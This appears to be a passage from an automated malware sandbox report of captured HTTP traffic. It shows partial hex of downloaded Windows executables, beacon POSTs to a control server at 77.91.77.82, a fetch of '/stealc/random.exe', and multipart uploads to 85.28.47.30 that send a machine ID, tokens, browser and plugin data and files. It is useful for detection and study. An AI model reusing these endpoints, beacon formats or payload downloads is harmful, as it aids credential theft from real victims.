                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:25:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:25:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKJJECAEGCBGDHDHCHost: 85.28.47.30Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 46 45 35 36 43 42 38 36 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 2d 2d 0d 0a Data Ascii: ------AECAKJJECAEGCBGDHDHCContent-Disposition: form-data; name="hwid"9EFE56CB86684217651120------AECAKJJECAEGCBGDHDHCContent-Disposition: form-data; name="build"Nice------AECAKJJECAEGCBGDHDHC--
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000006001&unit=246122658369
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKFHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 2d 2d 0d 0a Data Ascii: ------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="message"browsers------IEBAAFCAFCBKFHJJJKKF--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAEHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 2d 2d 0d 0a Data Ascii: ------EBAKKFHJDBKKEBFHDAAEContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------EBAKKFHJDBKKEBFHDAAEContent-Disposition: form-data; name="message"plugins------EBAKKFHJDBKKEBFHDAAE--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="message"fplugins------GIEHIDHJDBFIIECAKECB--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIHost: 85.28.47.30Content-Length: 6711Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAECHost: 85.28.47.30Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGDHost: 85.28.47.30Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAEHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 45 2d 2d 0d 0a Data Ascii: ------HDBKFHIJKJKECAAAECAEContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------HDBKFHIJKJKECAAAECAEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------HDBKFHIJKJKECAAAECAEContent-Disposition: form-data; name="file"------HDBKFHIJKJKECAAAECAE--
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGIDHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 2d 2d 0d 0a Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="file"------BGHJJDGHCBGDHIECBGID--
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
